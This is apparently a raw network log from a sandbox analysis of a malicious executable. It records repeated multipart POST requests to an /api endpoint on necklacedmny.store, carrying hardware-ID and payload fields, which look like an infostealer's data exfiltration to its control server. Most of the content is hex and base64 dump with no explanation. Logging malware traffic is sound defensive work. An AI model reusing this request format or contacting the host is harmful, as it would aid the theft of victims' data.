                                                                      2024-10-30 07:22:12 UTC353INData Raw: 34 64 62 0d 0a 6a 49 51 78 36 53 35 54 51 70 53 7a 4b 54 61 47 76 78 68 4e 43 38 4c 43 79 2f 34 7a 42 67 38 50 6e 33 58 34 35 51 46 33 30 71 33 33 70 6b 66 4c 46 47 64 75 74 73 42 4d 46 4c 7a 4c 61 6a 68 75 37 75 43 71 6d 68 45 38 61 57 37 7a 42 70 33 4a 49 77 47 2f 6a 37 62 69 55 49 56 64 4e 6d 36 32 31 6c 45 55 76 4f 52 6a 62 32 36 73 34 50 48 63 56 6d 78 74 62 76 4d 58 6d 59 35 75 42 37 37 4f 35 4f 68 57 67 55 73 77 4a 76 58 66 52 46 50 6a 32 6e 6b 6e 5a 61 75 76 6f 35 4d 52 4b 69 31 71 35 56 66 43 78 30 77 53 70 73 7a 42 35 55 4b 43 44 43 35 75 37 35 46 4d 57 4b 53 46 4f 69 78 75 6f 4b 36 74 6d 6c 68 75 5a 32 66 37 46 70 79 50 63 52 36 30 78 65 54 6d 56 59 42 42 4f 54 4c 34 31 55 4e 59 35 64 42 35 62 79 66 67 70 37 48 63 43 53 51 2b 58 2f 34 47 69 35
                                                                      Data Ascii: 4dbjIQx6S5TQpSzKTaGvxhNC8LCy/4zBg8Pn3X45QF30q33pkfLFGdutsBMFLzLajhu7uCqmhE8aW7zBp3JIwG/j7biUIVdNm621lEUvORjb26s4PHcVmxtbvMXmY5uB77O5OhWgUswJvXfRFPj2nknZauvo5MRKi1q5VfCx0wSpszB5UKCDC5u75FMWKSFOixuoK6tmlhuZ2f7FpyPcR60xeTmVYBBOTL41UNY5dB5byfgp7HcCSQ+X/4Gi5
                                                                      2024-10-30 07:22:12 UTC897INData Raw: 50 43 44 6b 32 55 42 66 34 63 39 78 4a 6d 53 74 6f 4b 53 57 58 6d 64 74 61 76 63 64 6c 59 31 6e 47 4c 33 4a 37 75 59 54 78 51 77 32 4f 4c 61 4a 43 33 66 68 7a 58 30 6a 66 2b 4b 61 36 59 4d 66 66 53 31 71 38 56 66 43 78 32 73 51 73 38 7a 6c 36 56 43 44 52 79 4d 67 35 4e 64 47 55 66 62 62 66 79 46 6a 6f 37 4b 6a 6b 6c 64 6e 5a 47 62 30 45 70 32 44 49 31 76 77 79 50 61 6d 43 38 74 74 50 43 76 36 32 31 78 55 70 4d 49 30 4e 69 6d 6e 72 4f 6e 45 45 57 42 73 61 66 77 54 6c 49 6c 6e 47 62 62 42 34 2b 6c 56 67 55 77 32 4b 76 37 5a 53 6c 6e 76 30 6e 6f 71 5a 4b 53 6d 70 5a 31 55 4a 43 4d 74 2b 67 2f 61 33 79 4d 37 74 38 7a 38 70 47 61 49 51 6a 38 6e 34 4a 46 55 47 76 32 64 66 53 4d 70 2b 4f 43 6e 6d 56 35 32 62 48 2f 34 47 59 69 4c 5a 68 4f 39 7a 4f 44 6d 56 6f 78
                                                                      Data Ascii: PCDk2UBf4c9xJmStoKSWXmdtavcdlY1nGL3J7uYTxQw2OLaJC3fhzX0jf+Ka6YMffS1q8VfCx2sQs8zl6VCDRyMg5NdGUfbbfyFjo7KjkldnZGb0Ep2DI1vwyPamC8ttPCv621xUpMI0NimnrOnEEWBsafwTlIlnGbbB4+lVgUw2Kv7ZSlnv0noqZKSmpZ1UJCMt+g/a3yM7t8z8pGaIQj8n4JFUGv2dfSMp+OCnmV52bH/4GYiLZhO9zODmVox
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 33 66 39 31 0d 0a 49 50 43 2f 2f 32 45 4a 47 37 74 46 30 50 57 53 71 70 61 65 51 56 47 74 74 62 50 77 5a 6b 49 77 6a 57 2f 44 49 39 71 59 4c 79 32 4d 38 4d 4f 54 62 51 45 57 6d 36 48 6b 68 5a 36 65 32 36 59 4d 66 66 53 31 71 38 56 66 43 78 32 67 54 76 4d 50 75 34 45 47 46 51 79 4d 71 35 4e 56 46 55 4f 6a 54 63 79 4a 6d 70 62 4b 74 6e 45 4e 6c 61 47 72 7a 47 6f 69 43 49 31 76 77 79 50 61 6d 43 38 74 32 42 53 66 6d 77 45 77 57 30 64 35 30 49 57 36 32 34 4c 62 53 53 43 52 71 59 62 31 50 32 6f 52 76 47 4c 6e 4b 34 66 52 5a 68 30 30 6a 4a 2f 2f 59 51 56 58 71 30 6e 45 6a 62 4c 4b 72 70 70 52 65 5a 57 42 67 39 68 4f 61 78 79 31 56 74 39 65 75 76 68 4f 71 51 54 34 79 39 63 41 4a 59 65 66 54 64 43 68 2f 34 4c 2f 6e 68 52 46 6a 59 53 32 6c 56 35 75 4c 62 78 53 2f
                                                                      Data Ascii: 3f91IPC//2EJG7tF0PWSqpaeQVGttbPwZkIwjW/DI9qYLy2M8MOTbQEWm6HkhZ6e26YMffS1q8VfCx2gTvMPu4EGFQyMq5NVFUOjTcyJmpbKtnENlaGrzGoiCI1vwyPamC8t2BSfmwEwW0d50IW624LbSSCRqYb1P2oRvGLnK4fRZh00jJ//YQVXq0nEjbLKrppReZWBg9hOaxy1Vt9euvhOqQT4y9cAJYefTdCh/4L/nhRFjYS2lV5uLbxS/
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 53 41 52 7a 55 6b 39 74 78 41 57 75 72 55 64 69 64 6c 70 37 4b 6b 6d 56 6c 75 5a 47 6a 78 47 70 6d 56 59 42 54 77 67 61 37 68 53 38 73 55 63 51 66 46 35 6d 67 55 2b 35 4e 6a 62 32 36 73 34 50 48 63 55 47 78 71 59 2f 6b 46 6c 4a 56 74 45 72 44 4a 35 75 35 55 68 30 49 2f 4d 76 37 51 53 31 72 72 31 58 4d 72 61 4b 53 6b 70 5a 73 52 4b 69 31 71 35 56 66 43 78 30 73 57 71 74 57 73 79 46 69 4c 53 79 45 32 37 5a 46 55 47 76 32 64 66 53 4d 70 2b 4f 43 74 6c 31 74 74 62 6d 54 35 47 70 71 4f 62 42 79 34 77 75 62 30 55 6f 46 65 4e 53 58 33 33 6b 46 51 37 4e 46 31 49 32 32 79 71 2b 6e 53 45 57 4e 31 4c 61 56 58 75 6f 78 31 4e 71 4c 64 72 76 6b 64 6b 67 77 32 4c 4c 61 4a 43 31 33 6f 33 48 73 6c 62 36 75 6c 70 4a 78 55 62 6d 70 68 2f 52 65 5a 67 57 55 59 75 4d 66 69 36
                                                                      Data Ascii: SARzUk9txAWurUdidlp7KkmVluZGjxGpmVYBTwga7hS8sUcQfF5mgU+5Njb26s4PHcUGxqY/kFlJVtErDJ5u5Uh0I/Mv7QS1rr1XMraKSkpZsRKi1q5VfCx0sWqtWsyFiLSyE27ZFUGv2dfSMp+OCtl1ttbmT5GpqObBy4wub0UoFeNSX33kFQ7NF1I22yq+nSEWN1LaVXuox1NqLdrvkdkgw2LLaJC13o3Hslb6ulpJxUbmph/ReZgWUYuMfi6
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 30 4b 50 33 58 52 56 58 69 30 58 64 76 4a 2b 43 6e 73 64 77 4a 4a 45 70 33 38 42 47 4e 6c 6c 59 53 73 4a 36 75 2b 52 32 53 44 44 59 73 74 6f 6b 4c 57 65 6a 58 64 79 70 74 71 4b 65 71 6e 56 31 67 59 47 44 35 48 70 36 43 63 51 65 32 77 65 37 70 58 59 52 41 49 79 37 7a 30 55 63 55 71 70 31 39 4e 79 6e 34 34 4a 69 4c 55 53 52 79 49 2b 52 58 6e 59 73 6a 54 66 44 41 34 2f 52 66 68 45 77 77 49 2f 4c 61 54 46 4c 69 33 48 6b 71 61 71 57 6d 71 4a 78 64 62 6d 70 6c 39 78 6d 58 67 57 63 54 74 6f 2b 67 70 6c 53 54 44 47 6c 67 78 4e 78 46 58 65 66 62 64 7a 6c 42 6b 65 43 32 30 6b 67 6b 61 6d 47 39 54 39 71 44 61 42 32 38 79 75 62 6a 55 6f 4e 47 4f 53 2f 35 77 30 70 62 37 64 70 78 49 6d 61 75 70 61 65 4f 56 6d 39 6d 5a 66 51 5a 6e 4d 63 74 56 62 66 58 72 72 34 54 76 55
                                                                      Data Ascii: 0KP3XRVXi0XdvJ+CnsdwJJEp38BGNllYSsJ6u+R2SDDYstokLWejXdyptqKeqnV1gYGD5Hp6CcQe2we7pXYRAIy7z0UcUqp19Nyn44JiLUSRyI+RXnYsjTfDA4/RfhEwwI/LaTFLi3HkqaqWmqJxdbmpl9xmXgWcTto+gplSTDGlgxNxFXefbdzlBkeC20kgkamG9T9qDaB28yubjUoNGOS/5w0pb7dpxImaupaeOVm9mZfQZnMctVbfXrr4TvU
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 32 55 39 61 39 74 78 31 62 79 66 67 70 37 48 63 43 53 52 63 65 2f 6f 51 6c 63 56 4b 45 71 76 4f 35 4f 56 59 68 77 77 75 62 75 2b 52 54 46 69 6b 68 54 6f 69 5a 61 32 6b 75 35 42 52 5a 47 52 71 39 77 57 56 69 47 34 57 73 4d 72 38 35 30 47 45 52 7a 51 6a 38 74 35 45 57 4f 7a 58 4f 6d 45 70 70 37 6a 70 78 42 46 49 62 6e 7a 33 56 62 32 64 64 52 4b 38 33 75 58 72 58 38 74 54 66 7a 6d 32 31 6b 63 55 76 4a 31 36 4c 6d 53 79 70 61 69 57 57 32 6c 6c 59 76 67 53 6c 59 4e 6e 48 72 37 64 34 4f 6c 54 6a 55 63 77 4a 66 58 61 51 56 72 74 7a 7a 70 68 4b 61 65 34 36 63 51 52 54 6e 5a 73 38 42 76 59 71 57 67 44 74 34 33 50 36 46 69 4d 51 43 64 67 36 5a 39 53 46 4f 50 52 4f 6e 63 70 71 61 36 6c 6e 31 5a 73 5a 57 6a 39 48 4a 71 49 61 52 75 33 33 65 54 71 57 5a 6c 44 4d 69 33
                                                                      Data Ascii: 2U9a9tx1byfgp7HcCSRce/oQlcVKEqvO5OVYhwwubu+RTFikhToiZa2ku5BRZGRq9wWViG4WsMr850GERzQj8t5EWOzXOmEpp7jpxBFIbnz3Vb2ddRK83uXrX8tTfzm21kcUvJ16LmSypaiWW2llYvgSlYNnHr7d4OlTjUcwJfXaQVrtzzphKae46cQRTnZs8BvYqWgDt43P6FiMQCdg6Z9SFOPROncpqa6ln1ZsZWj9HJqIaRu33eTqWZlDMi3
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 76 32 64 66 53 4d 70 2b 4f 43 70 6d 46 31 6e 61 6d 50 79 47 70 57 41 61 42 71 36 77 66 7a 70 56 6f 4e 41 4f 53 33 6b 32 30 46 47 37 64 52 33 49 57 47 79 6f 2b 6e 53 45 57 4e 31 4c 61 56 58 71 49 31 67 47 61 62 43 34 61 5a 4d 78 56 56 78 4a 2f 71 52 45 78 54 32 7a 33 6f 6b 61 61 65 75 75 35 31 5a 61 32 64 74 2b 78 79 51 68 47 6f 52 76 73 62 6f 35 31 36 4b 54 54 45 6c 39 74 68 5a 57 61 53 54 4f 69 68 78 34 50 6a 70 71 31 31 76 58 47 37 72 56 34 58 4a 65 6c 57 33 77 36 36 2b 45 34 70 65 50 43 6a 79 30 55 5a 53 37 39 78 37 4c 47 6d 67 6f 36 6d 5a 57 6d 74 72 61 76 41 64 6b 34 35 78 48 62 54 64 37 75 70 58 79 77 4a 78 4a 2b 36 52 45 78 54 55 33 6e 45 6a 61 61 32 31 36 59 4d 66 66 53 31 71 38 56 66 43 78 32 73 65 75 38 6e 6c 35 56 43 46 52 7a 73 76 2b 64 74 4e
                                                                      Data Ascii: v2dfSMp+OCpmF1namPyGpWAaBq6wfzpVoNAOS3k20FG7dR3IWGyo+nSEWN1LaVXqI1gGabC4aZMxVVxJ/qRExT2z3okaaeuu51Za2dt+xyQhGoRvsbo516KTTEl9thZWaSTOihx4Pjpq11vXG7rV4XJelW3w66+E4pePCjy0UZS79x7LGmgo6mZWmtravAdk45xHbTd7upXywJxJ+6RExTU3nEjaa216YMffS1q8VfCx2seu8nl5VCFRzsv+dtN
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 73 69 59 71 7a 69 71 4a 46 42 59 79 30 6a 76 52 48 61 33 7a 4e 62 38 4d 76 2f 70 67 76 62 48 6d 70 31 70 59 59 62 42 76 75 54 59 32 39 2f 34 50 6a 37 30 68 46 32 4c 54 57 39 55 4a 6d 56 63 52 4f 7a 32 65 32 68 62 62 56 73 4f 69 7a 31 33 55 70 54 70 4a 4d 36 49 43 6e 34 6d 65 6d 66 51 33 59 69 66 4f 73 61 69 6f 41 76 48 61 48 43 34 71 59 64 79 77 41 31 4b 2f 72 55 54 45 53 72 7a 32 6f 6b 5a 62 62 73 72 59 34 52 4b 69 31 38 39 68 69 49 69 57 52 61 6f 64 6e 6a 39 6c 43 4f 53 33 30 6f 35 39 78 48 46 4b 71 64 62 79 52 6c 70 71 32 38 30 30 42 79 62 6e 76 36 57 35 4b 57 62 68 6e 77 38 4b 43 6d 53 38 73 55 63 52 58 31 33 30 56 54 38 73 77 33 44 32 4b 73 6f 36 57 64 56 69 51 6a 4c 66 74 58 77 74 51 74 56 62 54 65 72 72 34 44 32 52 64 6b 63 36 47 42 47 55 75 71 78
                                                                      Data Ascii: siYqziqJFBYy0jvRHa3zNb8Mv/pgvbHmp1pYYbBvuTY29/4Pj70hF2LTW9UJmVcROz2e2hbbVsOiz13UpTpJM6ICn4memfQ3YifOsaioAvHaHC4qYdywA1K/rUTESrz2okZbbsrY4RKi189hiIiWRaodnj9lCOS30o59xHFKqdbyRlpq2800Bybnv6W5KWbhnw8KCmS8sUcRX130VT8sw3D2Kso6WdViQjLftXwtQtVbTerr4D2Rdkc6GBGUuqx
                                                                      2024-10-30 07:22:12 UTC1369INData Raw: 67 2b 50 72 53 45 58 59 74 4e 62 31 51 6c 49 70 69 46 72 37 4d 2f 50 52 56 69 46 6f 79 5a 38 6a 76 62 6c 6e 70 32 48 51 6f 56 35 36 42 6f 34 78 63 61 32 70 54 77 79 43 4c 67 48 4e 58 6c 73 7a 34 35 52 50 46 44 43 6c 67 72 70 46 71 58 76 54 51 64 53 67 70 37 75 43 74 33 41 6b 6b 53 47 44 77 45 70 53 41 49 54 53 36 33 2b 50 70 56 4d 73 43 63 53 79 32 69 51 74 56 37 73 31 33 49 47 37 73 70 37 4f 62 45 53 6f 74 59 37 31 50 32 6f 5a 70 42 62 33 41 36 61 70 56 68 55 4a 78 50 37 6a 49 43 30 4b 6b 68 53 6c 68 4b 62 4c 67 38 64 77 57 61 6d 42 73 2f 68 6d 5a 6c 58 45 54 73 39 6e 74 6f 57 32 31 61 54 77 74 38 39 39 4d 61 74 72 38 63 44 39 6b 72 36 66 72 76 46 5a 79 62 6c 50 44 49 49 75 41 63 31 65 57 7a 50 6a 6c 45 38 55 4d 4b 57 43 75 6b 57 70 65 39 4e 42 31 4b 43
                                                                      Data Ascii: g+PrSEXYtNb1QlIpiFr7M/PRViFoyZ8jvblnp2HQoV56Bo4xca2pTwyCLgHNXlsz45RPFDClgrpFqXvTQdSgp7uCt3AkkSGDwEpSAITS63+PpVMsCcSy2iQtV7s13IG7sp7ObESotY71P2oZpBb3A6apVhUJxP7jIC0KkhSlhKbLg8dwWamBs/hmZlXETs9ntoW21aTwt899Matr8cD9kr6frvFZyblPDIIuAc1eWzPjlE8UMKWCukWpe9NB1KC


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649713188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:13 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12864
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:13 UTC12864OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:14 UTC1022INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=q38r2j4v3mdm106e6b0vdovvga; expires=Sun, 23 Feb 2025 01:08:53 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sMx41ghXRPNa5b3WWteYFW4gPz8yy6u%2BQhC4137kheFfLo%2Bp3cuRlz6D4POpo%2F9th6Uuu1Q0qL3gDDcexa6sCRo6kQ0YI2ETsrVb%2BXSZa90%2BK10oVbJRI9wef9L0keBDXbYW%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a72c7d412e79-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1372&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13806&delivery_rate=2061209&cwnd=248&unsent_bytes=0&cid=b86c286b291093d3&ts=529&x=0"
                                                                      2024-10-30 07:22:14 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 07:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649719188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:14 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15110
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:14 UTC15110OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:15 UTC1027INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=5ip8g6ptua5qifoksdsh59ppfd; expires=Sun, 23 Feb 2025 01:08:54 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a3ELk40sq1njhEOgbbuHNe9PzEPNbJaIa%2FDUno4t25BAlxanAEAFr%2FuC%2FhE5LbZJhUhdkQ%2Fd1He%2BNDxspEy5gqF6%2B9XVBj%2BC4utxs7kgluspYVi0FtUunxaduY%2B%2FnWgCWNKMxdw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a7341b93eb27-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2844&recv_bytes=16052&delivery_rate=2498705&cwnd=32&unsent_bytes=0&cid=7614aa3a8a8fb9d5&ts=758&x=0"
                                                                      2024-10-30 07:22:15 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 07:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649725188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:16 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 19968
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:16 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:16 UTC4637OUTData Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
                                                                      Data Ascii: +?2+?2+?o?Mp5p
                                                                      2024-10-30 07:22:17 UTC1015INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=11fesbuqaoo5oa2akhcp0irurg; expires=Sun, 23 Feb 2025 01:08:56 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gORtLQhD%2FQjQdKPf0MyFEAcphmo8AZ8S4nGDK41kOsgk3oRhnvIZoQNGs2PTxWoLVeyJIMvo8IIVjNGBdaA1iU0us7LeZMSuU2HFo4XvOCHJVFuF6au9LH1TFE27xNn%2FrzuXFHw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a73dfcc76b25-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1267&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20932&delivery_rate=2260733&cwnd=235&unsent_bytes=0&cid=5294a40fe0e0d7d1&ts=872&x=0"
                                                                      2024-10-30 07:22:17 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 07:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649736188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:18 UTC283OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1222
                                                                      Host: necklacedmny.store
